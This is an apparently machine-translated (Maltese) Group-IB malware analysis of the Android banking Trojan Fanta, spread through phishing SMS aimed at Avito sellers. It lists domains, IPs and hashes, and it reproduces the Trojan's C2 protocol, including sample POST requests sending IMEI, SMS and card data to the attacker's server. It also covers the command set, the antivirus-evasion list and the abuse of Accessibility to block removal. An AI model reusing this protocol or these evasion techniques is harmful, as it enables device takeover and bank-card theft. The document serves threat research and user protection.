Ġurnata waħda trid tbigħ xi ħaġa fuq Avito u, wara li poġġiet deskrizzjoni dettaljata tal-prodott tiegħek (pereżempju, modulu RAM), tirċievi dan il-messaġġ:
Ladarba tiftaħ il-link, tara paġna li tidher innokwa li tinnotifika lilek, il-bejjiegħ kuntent u ta' suċċess, li sar xirja:
Ladarba tikklikkja l-buttuna "Kompli", fajl APK b'ikona u isem li jispira l-fiduċja jitniżżlu fuq it-tagħmir Android tiegħek. Installajt applikazzjoni li għal xi raġuni talbet id-drittijiet tal-AccessibilityService, imbagħad dehru ftit twieqi u sparixxew malajr u... Dak hu.
Inti tmur tiċċekkja l-bilanċ tiegħek, iżda għal xi raġuni l-app bankarja tiegħek terġa' titlob id-dettalji tal-karta tiegħek. Wara li ddaħħal id-dejta, tiġri xi ħaġa terribbli: għal xi raġuni għadha mhix ċara għalik, il-flus jibdew jisparixxu mill-kont tiegħek. Qed tipprova ssolvi l-problema, iżda t-telefon tiegħek jirreżisti: jagħfas it-tasti "Lura" u "Home", ma jintefax u ma jippermettilek tattiva l-ebda miżura ta 'sigurtà. Bħala riżultat, inti titħalla mingħajr flus, l-oġġetti tiegħek ma nxtrawx, inti konfuż u tistaqsi: x'ġara?
It-tweġiba hija sempliċi: inti sirt vittma tal-Android Trojan Fanta, membru tal-familja Flexnet. Kif ġara dan? Ejja nispjegaw issa.
Awturi: Andrey Polovinkin, speċjalista junior fl-analiżi tal-malware, Ivan Pisarev, speċjalista fl-analiżi tal-malware.
Xi statistiċi
Il-familja Flexnet ta' Android Trojans saret magħrufa għall-ewwel darba lura fl-2015. Matul perjodu ta 'attività pjuttost twil, il-familja espandiet għal diversi sottospeċi: Fanta, Limebot, Lipton, eċċ. It-Trojan, kif ukoll l-infrastruttura assoċjata miegħu, ma jibqgħux wieqfa: qed jiġu żviluppati skemi ta’ distribuzzjoni effettivi ġodda - fil-każ tagħna, paġni ta’ phishing ta’ kwalità għolja mmirati lejn utent-bejjiegħ speċifiku, u l-iżviluppaturi Trojan isegwu xejriet tal-moda fil- kitba tal-virus - iżżid funzjonalità ġdida li tagħmilha possibbli li tisraq flus b'mod aktar effiċjenti minn apparat infettat u tevita mekkaniżmi ta' protezzjoni.
Il-kampanja deskritta f'dan l-artikolu hija mmirata lejn utenti mir-Russja; numru żgħir ta 'apparati infettati ġew irreġistrati fl-Ukraina, u saħansitra inqas fil-Każakstan u l-Belarus.
Anke jekk Flexnet ilu fl-arena Android Trojan għal aktar minn 4 snin issa u ġie studjat fid-dettall minn ħafna riċerkaturi, għadu f'forma tajba. Minn Jannar 2019, l-ammont potenzjali ta 'ħsara huwa aktar minn 35 miljun rublu - u dan huwa biss għal kampanji fir-Russja. Fl-2015, diversi verżjonijiet ta 'dan it-Trojan Android inbiegħu fuq forums taħt l-art, fejn seta' jinstab ukoll il-kodiċi tas-sors tat-Trojan b'deskrizzjoni dettaljata. Dan ifisser li l-istatistika tal-ħsara fid-dinja hija saħansitra aktar impressjonanti. Mhux indikatur ħażin għal raġel xiħ bħal dan, hux?
Mill-bejgħ għall-qerq
Kif jidher mill-screenshot ippreżentata qabel ta 'paġna ta' phishing għas-servizz tal-Internet għall-istazzjonar ta 'reklami Avito, kienet ippreparata għal vittma speċifika. Apparentement, l-attakkanti jużaw wieħed mill-parsers ta 'Avito, li estratti n-numru tat-telefon u l-isem tal-bejjiegħ, kif ukoll id-deskrizzjoni tal-prodott. Wara li tespandi l-paġna u tipprepara l-fajl APK, il-vittma tintbagħat SMS b'ismu u link għal paġna tal-phishing li fiha deskrizzjoni tal-prodott tiegħu u l-ammont riċevut mill-"bejgħ" tal-prodott. Billi tikklikkja fuq il-buttuna, l-utent jirċievi fajl APK malizzjuż - Fanta.
Studju tad-dominju shcet491[.]ru wera li huwa delegat lis-servers DNS ta’ Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Il-fajl taż-żona tad-dominju fih entrati li jindikaw l-indirizzi IP 31.220.23[.]236, 31.220.23[.]243, u 31.220.23[.]235. Madankollu, ir-rekord tar-riżorsi primarji tad-dominju (rekord A) jindika server b'indirizz IP 178.132.1[.]240.
L-indirizz IP 178.132.1[.]240 jinsab fl-Olanda u jappartjeni lill-hoster WorldStream. L-indirizzi IP 31.220.23[.]235, 31.220.23[.]236 u 31.220.23[.]243 jinsabu fir-Renju Unit u jappartjenu għas-server ta’ hosting kondiviż HOSTINGER. Użat bħala recorder openprov-ru. Id-dominji li ġejjin ġew solvuti wkoll għall-indirizz IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Għandu jiġi nnutat li links fil-format li ġej kienu disponibbli minn kważi d-dominji kollha:
http://(www.){0,1}<%domain%>/[0-9]{7}
Dan il-mudell jinkludi wkoll link minn messaġġ SMS. Ibbażat fuq data storika, instab li dominju wieħed jikkorrispondi għal diversi links fil-mudell deskritt hawn fuq, li jindika li dominju wieħed intuża biex iqassam it-Trojan lil diversi vittmi.
Ejja naqbżu ftit 'il quddiem: it-Trojan imniżżel permezz ta' link minn SMS juża l-indirizz bħala server ta' kontroll onusedseddohap[.]club. Dan id-dominju ġie rreġistrat fi 2019-03-12, u mill-2019-04-29, l-applikazzjonijiet APK interaġixxew ma' dan id-dominju. Ibbażat fuq data miksuba minn VirusTotal, total ta’ 109 applikazzjoni interaġixxew ma’ dan is-server. Id-dominju nnifsu riżolta għall-indirizz IP 217.23.14[.]27, li tinsab fl-Olanda u proprjetà tal-hoster WorldStream. Użat bħala recorder namecheap. Id-dominji ġew solvuti wkoll għal dan l-indirizz IP bad-racoon[.]klabb (li jibda mill-2018-09-25) u bad-racoon[.]live (li jibda mill-2018-10-25). Bil-dominju bad-racoon[.]klabb aktar minn 80 fajl APK interazzjoni magħhom bad-racoon[.]live - aktar minn 100.
B'mod ġenerali, l-attakk jimxi kif ġej:
X'hemm taħt l-għatu ta' Fanta?
Bħal ħafna Trojans Android oħra, Fanta huwa kapaċi jaqra u jibgħat messaġġi SMS, jagħmel talbiet USSD, u juri t-twieqi tiegħu stess fuq l-applikazzjonijiet (inklużi dawk bankarji). Madankollu, wasal l-armament tal-funzjonalità ta 'din il-familja: Fanta bdiet tuża Servizz ta' Aċċessibilità għal diversi skopijiet: qari tal-kontenut ta’ notifiki minn applikazzjonijiet oħra, prevenzjoni ta’ skoperta u twaqqaf l-eżekuzzjoni ta’ Trojan fuq apparat infettat, eċċ. Fanta jaħdem fuq il-verżjonijiet kollha ta' Android mhux iżgħar minn 4.4. F'dan l-artikolu se nagħtu ħarsa aktar mill-qrib lejn il-kampjun Fanta li ġej:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Immedjatament wara t-tnedija
Immedjatament wara t-tnedija, it-Trojan jaħbi l-ikona tiegħu. L-applikazzjoni tista' taħdem biss jekk l-isem tal-apparat infettat ma jkunx fil-lista:
- android_x86
- VirtualBox
- Nexus 5X(bullhead)
- Nexus 5(leħja)
Din il-verifika titwettaq fis-servizz ewlieni tat-Trojan - MainService. Meta titnieda għall-ewwel darba, il-parametri tal-konfigurazzjoni tal-applikazzjoni huma inizjalizzati għal valuri awtomatiċi (il-format għall-ħażna tad-dejta tal-konfigurazzjoni u t-tifsira tagħhom se jiġu diskussi aktar tard), u apparat ġdid infettat jiġi rreġistrat fuq is-server tal-kontroll. Talba HTTP POST bit-tip ta' messaġġ tintbagħat lis-server register_bot u informazzjoni dwar l-apparat infettat (verżjoni Android, IMEI, numru tat-telefon, isem tal-operatur u kodiċi tal-pajjiż li fih l-operatur huwa rreġistrat). L-indirizz iservi bħala s-server tal-kontroll hXXp://onuseseddohap[.]club/controller.php. Bi tweġiba, is-server jibgħat messaġġ li jkun fih l-oqsma bot_id, bot_pwd, servers — l-applikazzjoni ssalva dawn il-valuri bħala parametri tas-server CnC. Parametru servers mhux obbligatorju jekk il-field ma ġiex riċevut: Fanta juża l-indirizz tar-reġistrazzjoni - hXXp://onuseseddohap[.]club/controller.php. Il-funzjoni li tinbidel l-indirizz CnC tista 'tintuża biex issolvi żewġ problemi: biex tqassam it-tagħbija b'mod uniformi bejn diversi servers (jekk ikun hemm numru kbir ta' apparati infettati, it-tagħbija fuq server tal-web mhux ottimizzat tista 'tkun għolja), u wkoll biex tuża server alternattiv fil-każ ta' falliment ta' wieħed mis-servers CnC.
Jekk iseħħ żball waqt li tibgħat it-talba, it-Trojan jirrepeti l-proċess ta 'reġistrazzjoni wara 20 sekonda.
Ladarba l-apparat ikun ġie rreġistrat b'suċċess, Fanta se juri l-messaġġ li ġej lill-utent:
Nota importanti: is-servizz sejjaħ Sigurtà tas-sistema — l-isem tas-servizz Trojan, u wara li tikklikkja l-buttuna OK Tinfetaħ tieqa bis-settings tal-Aċċessibilità tal-apparat infettat, fejn l-utent irid jagħti drittijiet tal-Aċċessibilità għas-servizz malizzjuż:
Hekk kif l-utent jixgħel Servizz ta' Aċċessibilità, Fanta jikseb aċċess għall-kontenut tat-twieqi tal-applikazzjoni u l-azzjonijiet imwettqa fihom:
Immedjatament wara li jirċievi d-drittijiet ta’ Aċċessibilità, it-Trojan jitlob drittijiet ta’ amministratur u drittijiet biex jaqra n-notifiki:
Bl-użu tal-AccessibilityService, l-applikazzjoni tissimula keystrokes, u b'hekk tagħti lilha nnifisha d-drittijiet kollha meħtieġa.
Fanta joħloq każijiet multipli tad-database (li se jiġu deskritti aktar tard) meħtieġa biex taħżen id-dejta tal-konfigurazzjoni, kif ukoll l-informazzjoni miġbura fil-proċess dwar l-apparat infettat. Biex tibgħat l-informazzjoni miġbura, it-Trojan joħloq kompitu ripetut iddisinjat biex tniżżel oqsma mid-database u jirċievi kmand mis-server tal-kontroll. L-intervall għall-aċċess għal CnC huwa stabbilit skont il-verżjoni Android: fil-każ ta '5.1, l-intervall ikun ta' 10 sekondi, inkella 60 sekonda.
Biex tirċievi l-kmand, Fanta tagħmel talba GetTask lis-server tal-ġestjoni. Bi tweġiba, CnC jista 'jibgħat wieħed mill-kmandi li ġejjin:
| Team | Deskrizzjoni |
|---|---|
| 0 | Ibgħat messaġġ SMS |
| 1 | Agħmel telefonata jew kmand USSD |
| 2 | Taġġorna parametru intervall |
| 3 | Taġġorna parametru jinterċettaw |
| 6 | Taġġorna parametru smsManager |
| 9 | Ibda tiġbor messaġġi SMS |
| 11 | Irrisettja t-telefon tiegħek għall-issettjar tal-fabbrika |
| 12 | Jippermettu/Iżżarma l-illoggjar tal-ħolqien tal-kaxxa tad-djalogu |
Fanta tiġbor ukoll notifiki minn 70 app bankarja, sistemi ta' ħlas veloċi u kartieri elettroniċi u jaħżnuhom f'database.
Il-ħażna tal-parametri tal-konfigurazzjoni
Biex taħżen il-parametri tal-konfigurazzjoni, Fanta juża approċċ standard għall-pjattaforma Android - preferenzi-fajls. Is-settings jiġu ssejvjati f'fajl imsemmi settings. Deskrizzjoni tal-parametri salvati tinsab fit-tabella hawn taħt.
| isem | Valur default | Valuri possibbli | Deskrizzjoni |
|---|---|---|---|
| id | 0 | Integer | ID tal-bot |
| servers | hXXp://onuseseddohap[.]club/ | URL | Kontroll l-indirizz tas-server |
| pwd | - | String | Password tas-server |
| intervall | 20 | Integer | Intervall tal-ħin. Jindika kemm għandhom jiġu differiti l-kompiti li ġejjin:
|
| jinterċettaw | kollha | kollha/TelNumber | Jekk il-qasam huwa ugwali għas-sekwenza kollha jew TelNumber, allura l-messaġġ SMS riċevut jiġi interċettat mill-applikazzjoni u mhux muri lill-utent |
| smsManager | 0 | 0/1 | Ippermetti/itwaqqaf l-applikazzjoni bħala r-riċevitur tal-SMS default |
| readDialog | falza | Veru/falz | Ippermetti/Iżżejjen l-illoggjar tal-avvenimenti AċċessibilitàAvveniment |
Fanta juża wkoll il-fajl smsManager:
| isem | Valur default | Valuri possibbli | Deskrizzjoni |
|---|---|---|---|
| pckg | - | String | Isem tal-maniġer tal-messaġġi SMS użat |
Interazzjoni ma' databases
Matul it-tħaddim tiegħu, it-Trojan juża żewġ databases. Database msemmija a użati biex jaħżnu informazzjoni varji miġbura mit-telefon. It-tieni database hija msemmija fanta.db u jintuża biex isalva settings responsabbli għall-ħolqien ta' twieqi tal-phishing iddisinjati biex jiġbru informazzjoni dwar karti bankarji.
Trojan juża database а biex taħżen l-informazzjoni miġbura u tilloggja l-azzjonijiet tiegħek. Id-dejta hija maħżuna f'tabella zkuk. Biex toħloq tabella, uża l-mistoqsija SQL li ġejja:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Id-database fiha l-informazzjoni li ġejja:
1. Logging tal-istartjar tal-apparat infettat b'messaġġ It-telefon mixgħul!
2. Notifiki minn applikazzjonijiet. Il-messaġġ huwa ġġenerat skont il-mudell li ġej:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Data tal-kards tal-bank minn forom ta' phishing maħluqa mit-Trojan. Parametru VIEW_NAME jista' jkun wieħed minn dawn li ġejjin:
- AliExpress
- Avito
- Google Play
- Mixxellanji <%App Name%>
Il-messaġġ huwa illoggjat fil-format:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Messaġġi SMS deħlin/ħerġin fil-format:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informazzjoni dwar il-pakkett li joħloq il-kaxxa tad-djalogu fil-format:
(<%Package name%>)<%Package information%>
Eżempju ta' tabella zkuk:
Waħda mill-funzjonalità tal-Fanta hija l-ġbir ta 'informazzjoni dwar il-karti tal-bank. Il-ġbir tad-dejta jseħħ permezz tal-ħolqien ta 'twieqi tal-phishing meta jinfetħu applikazzjonijiet bankarji. It-Trojan joħloq it-tieqa tal-phishing darba biss. Informazzjoni li t-tieqa ġiet murija lill-utent hija maħżuna f'tabella settings fid-database fanta.db. Biex toħloq database, uża l-mistoqsija SQL li ġejja:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);L-oqsma kollha tat-tabella settings awtomatikament inizjalizzat għal 1 (oħloq tieqa tal-phishing). Wara li l-utent idaħħal id-dejta tiegħu, il-valur jiġi ssettjat għal 0. Eżempju ta' oqsma tat-tabella settings:
- can_login — il-qasam huwa responsabbli biex juri l-formola meta tiftaħ applikazzjoni bankarja
- l-ewwel_bank - mhux użat
- can_avito — il-qasam huwa responsabbli biex juri l-formola meta tiftaħ l-applikazzjoni Avito
- can_ali — il-qasam huwa responsabbli biex juri l-formola meta tiftaħ l-applikazzjoni ta’ Aliexpress
- jista_ieħor — il-qasam huwa responsabbli biex juri l-formola meta tiftaħ kwalunkwe applikazzjoni mil-lista: Yula, Pandao, Drom Auto, Kartiera. Kards ta' skont u bonus, Aviasales, Booking, Trivago
- can_card — il-field huwa responsabbli biex juri l-formola meta tiftaħ Google Play
Interazzjoni mas-server tal-ġestjoni
L-interazzjoni tan-netwerk mas-server tal-ġestjoni sseħħ permezz tal-protokoll HTTP. Biex taħdem man-netwerk, Fanta juża l-librerija popolari Retrofit. It-talbiet jintbagħtu lil: hXXp://onuseseddohap[.]club/controller.php. L-indirizz tas-server jista' jinbidel meta tirreġistra fuq is-server. Il-cookies jistgħu jintbagħtu bi tweġiba mis-server. Fanta jagħmel it-talbiet li ġejjin lis-server:
- Ir-reġistrazzjoni tal-bot fuq is-server tal-kontroll isseħħ darba, mal-ewwel tnedija. Id-dejta li ġejja dwar l-apparat infettat tintbagħat lis-server:
· Cookie — cookies riċevuti mis-server (il-valur default huwa string vojta)
· mod — kostanti tal-korda register_bot
· prefiss — kostanti numru sħiħ 2
· version_sdk — hija ffurmata skont il-mudell li ġej: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI tal-apparat infettat
· pajjiż — kodiċi tal-pajjiż li fih l-operatur huwa rreġistrat, fil-format ISO
· numru - numru tat-telefon
· operatur — isem l-operaturEżempju ta’ talba mibgħuta lis-server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Bi tweġiba għat-talba, is-server għandu jirritorna oġġett JSON li jkun fih il-parametri li ġejjin:
· bot_id — ID tal-apparat infettat. Jekk bot_id huwa ugwali għal 0, Fanta jerġa' jesegwixxi t-talba.
bot_pwd — password għas-server.
server — l-indirizz tas-server tal-kontroll. Parametru mhux obbligatorju. Jekk il-parametru ma jkunx speċifikat, se jintuża l-indirizz issejvjat fl-applikazzjoni.Eżempju ta' oġġett JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Talba biex tirċievi kmand mis-server. Id-dejta li ġejja tintbagħat lis-server:
· Cookie — cookies riċevuti mis-server
· offerta — id tal-apparat infettat li ġie riċevut meta bagħtet it-talba register_bot
· pwd —password għas-server
· divice_admin — il-qasam jiddetermina jekk inkisbux drittijiet ta' amministratur. Jekk ikunu nkisbu drittijiet ta' amministratur, il-qasam huwa ugwali għal 1, inkella 0
· Aċċessibilità — L-istatus tal-operat tas-Servizz ta' Aċċessibilità. Jekk is-servizz inbeda, il-valur huwa 1, inkella 0
· SMSManager — turi jekk it-Trojan huwiex attivat bħala l-applikazzjoni awtomatika biex tirċievi SMS
· iskrin — juri f'liema stat jinsab l-iskrin. Il-valur se jiġi stabbilit 1, jekk l-iskrin huwa mixgħul, inkella 0;Eżempju ta’ talba mibgħuta lis-server:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Skont il-kmand, is-server jista 'jirritorna oġġett JSON b'parametri differenti:
· Team Ibgħat messaġġ SMS: Il-parametri fihom in-numru tat-telefon, it-test tal-messaġġ SMS u l-ID tal-messaġġ li qed jintbagħat. L-identifikatur jintuża meta jintbagħat messaġġ lis-server bit-tip setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Team Agħmel telefonata jew kmand USSD: In-numru tat-telefon jew il-kmand jiġi fil-korp tar-rispons.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Team Ibdel il-parametru tal-intervall.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Team Ibdel il-parametru tal-interċettazzjoni.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Team Ibdel il-qasam tal-SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Team Iġbor messaġġi SMS minn apparat infettat.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Team Irrisettja t-telefon tiegħek għall-issettjar tal-fabbrika:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Team Ibdel il-parametru ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Tibgħat messaġġ bit-tip setSmsStatus. Din it-talba ssir wara li jiġi esegwit il-kmand Ibgħat messaġġ SMS. It-talba tidher bħal din:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Tlugħ tal-kontenut tad-database. Ringiela waħda tiġi trażmessa għal kull talba. Id-dejta li ġejja tintbagħat lis-server:
· Cookie — cookies riċevuti mis-server
· mod — kostanti tal-korda setSaveInboxSms
· offerta — id tal-apparat infettat li ġie riċevut meta bagħtet it-talba register_bot
· test — test fir-rekord tad-database kurrenti (field d mit-tabella zkuk fid-database а)
· numru — isem tar-rekord tad-database kurrenti (field p mit-tabella zkuk fid-database а)
· sms_mode — valur sħiħ (field m mit-tabella zkuk fid-database а)It-talba tidher bħal din:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Jekk tintbagħat b'suċċess lis-server, ir-ringiela titħassar mit-tabella. Eżempju ta' oġġett JSON ritornat mis-server:
{ "response":[], "status":"ok" }
Interazzjoni ma' AccessibilityService
AccessibilityService ġie implimentat biex jagħmel it-tagħmir Android aktar faċli biex jintuża għal persuni b'diżabilità. F'ħafna każijiet, interazzjoni fiżika hija meħtieġa biex jinteraġixxu ma 'applikazzjoni. AccessibilityService jippermettilek li tagħmelhom b'mod programmatiku. Fanta juża s-servizz biex joħloq twieqi foloz fl-applikazzjonijiet bankarji u jipprevjeni lill-utenti milli jiftħu s-settings tas-sistema u xi applikazzjonijiet.
Bl-użu tal-funzjonalità tal-AccessibilityService, it-Trojan jimmonitorja l-bidliet fl-elementi fuq l-iskrin tal-apparat infettat. Kif deskritt qabel, is-settings tal-Fanta fihom parametru responsabbli għall-operazzjonijiet tal-illoggjar b'kaxxi tad-djalogu - readDialog. Jekk dan il-parametru jiġi ssettjat, l-informazzjoni dwar l-isem u d-deskrizzjoni tal-pakkett li wassal għall-avveniment se tiġi miżjuda mad-database. It-Trojan iwettaq l-azzjonijiet li ġejjin meta jinħolqu avvenimenti:
- Jissimula l-ippressar taċ-ċwievet tad-dahar u tad-dar fil-każijiet li ġejjin:
· jekk l-utent irid jerġa 'jibda l-apparat tiegħu
· jekk l-utent irid iħassar l-applikazzjoni “Avito” jew ibiddel id-drittijiet ta’ aċċess
· jekk hemm referenza għall-applikazzjoni “Avito” fil-paġna
· meta tiftaħ l-applikazzjoni Google Play Protect
· meta tiftaħ paġni b'settings ta' AccessibilityService
· meta tidher il-kaxxa tad-djalogu tas-Sigurtà tas-Sistema
· meta tiftaħ il-paġna bis-settings "Iġbed fuq app oħra".
· meta tiftaħ il-paġna "Applikazzjonijiet", "Irkupru u reset", "Reset tad-data", "Reset settings", "Panew tal-iżviluppatur", "Speċjali. opportunitajiet”, “Opportunitajiet speċjali”, “Drittijiet speċjali”
· jekk l-avveniment ġie ġġenerat minn ċerti applikazzjonijiet.Lista ta' applikazzjonijiet
- android
- Master Lite
- Kaptan nadif
- Nadif Master għal CPU x86
- Ġestjoni tal-Permess tal-Applikazzjoni Meizu
- Sigurtà MIUI
- Clean Master - Antivirus & Cache u Garbage Cleaner
- Kontrolli tal-ġenituri u GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Sigurtà PRO
- Avast antivirus & protezzjoni ħielsa 2019
- Sigurtà mobbli MegaFon
- Protezzjoni AVG għal Xperia
- Sigurtà mobbli
- Malwarebytes antivirus u protezzjoni
- Antivirus għal Android 2019
- Master tas-Sigurtà - Antivirus, VPN, AppLock, Booster
- AVG antivirus għall-Maniġer tas-Sistema tal-pillola Huawei
- Samsung Aċċessibilità
- Samsung Smart Manager
- Kaptan tas-sigurtà
- Booster tal-veloċità
- dr.web
- Spazju tas-Sigurtà Dr.Web
- Dr.Web Mobile Control Center
- Dr.Web Sigurtà Spazjali Ħajja
- Dr.Web Mobile Control Center
- Antivirus & Sigurtà Mobbli
- Kaspersky Internet Security: Antivirus u Protezzjoni
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - protezzjoni u ġestjoni
- AVG Antivirus ħielsa 2019 – Protezzjoni għal Android
- Android Antivirus
- Norton Mobile Security u Antivirus
- Antivirus, firewall, VPN, sigurtà mobbli
- Sigurtà mobbli: antivirus, VPN, protezzjoni kontra s-serq
- Antivirus għal Android
- Jekk jintalab permess meta jintbagħat messaġġ SMS lil numru qasir, Fanta tissimula li tikklikkja fuq il-kaxxa tal-kontroll Ftakar l-għażla u buttuna Ibgħat.
- Meta tipprova tneħħi d-drittijiet tal-amministratur mit-Trojan, tissakkar l-iskrin tat-telefon.
- Jipprevjeni li żżid amministraturi ġodda.
- Jekk l-applikazzjoni antivirus dr.web misjuba theddida, Fanta timita tagħfas il-buttuna jinjora.
- It-Trojan jissimula li tagħfas il-buttuna tad-dahar u tad-dar jekk l-avveniment ġie ġġenerat mill-applikazzjoni Kura tal-Apparat Samsung.
- Fanta toħloq twieqi tal-phishing b'formoli biex tiddaħħal informazzjoni dwar kards bankarji jekk tkun imnedija applikazzjoni minn lista ta' madwar 30 servizz differenti tal-Internet. Fosthom: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, eċċ.
Formoli ta' phishing
Fanta janalizza liema applikazzjonijiet qed jaħdmu fuq l-apparat infettat. Jekk tkun infetħet applikazzjoni ta’ interess, it-Trojan juri tieqa tal-phishing fuq l-oħrajn kollha, li hija formola biex tiddaħħal l-informazzjoni tal-kard tal-bank. L-utent għandu jdaħħal id-dejta li ġejja:
- Numru tal-kard
- Data ta' skadenza tal-karta
- CVV
- Isem tad-detentur tal-kard (mhux għall-banek kollha)
Skont l-applikazzjoni li qed taħdem, se jintwerew twieqi differenti tal-phishing. Hawn taħt hawn eżempji ta’ xi wħud minnhom:
Aliexpress:
Avito:
Għal xi applikazzjonijiet oħra, eż. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Kif kien verament
Fortunatament, il-persuna li rċeviet il-messaġġ SMS deskritt fil-bidu tal-artiklu rriżulta li kien speċjalista taċ-ċibersigurtà. Għalhekk, il-verżjoni reali, mhux tad-direttur hija differenti minn dik li qalulha qabel: persuna rċeviet SMS interessanti, u wara tah lit-tim tal-Intelligence tal-Kaċċa tat-Theddid tal-Grupp-IB. Ir-riżultat tal-attakk huwa dan l-artikolu. Tmiem it-tajjeb, hux? Madankollu, mhux l-istejjer kollha jispiċċaw b'hekk b'suċċess, u sabiex tiegħek ma tidhirx qisha qatgħa ta 'direttur b'telf ta' flus, fil-biċċa l-kbira tal-każijiet huwa biżżejjed li żżomm mar-regoli li ġejjin deskritti fit-tul:
- tinstallax applikazzjonijiet għal apparat mobbli b'Android OS minn xi sorsi minbarra Google Play
- Meta tinstalla applikazzjoni, agħti attenzjoni speċjali lid-drittijiet mitluba mill-applikazzjoni
- tagħti attenzjoni lill-estensjonijiet tal-fajls imniżżla
- tinstalla l-aġġornamenti tal-OS Android regolarment
- ma żżurx riżorsi suspettużi u ma tniżżel fajls minn hemm
- Tikklikkjax fuq links riċevuti f'messaġġi SMS.
Sors: www.habr.com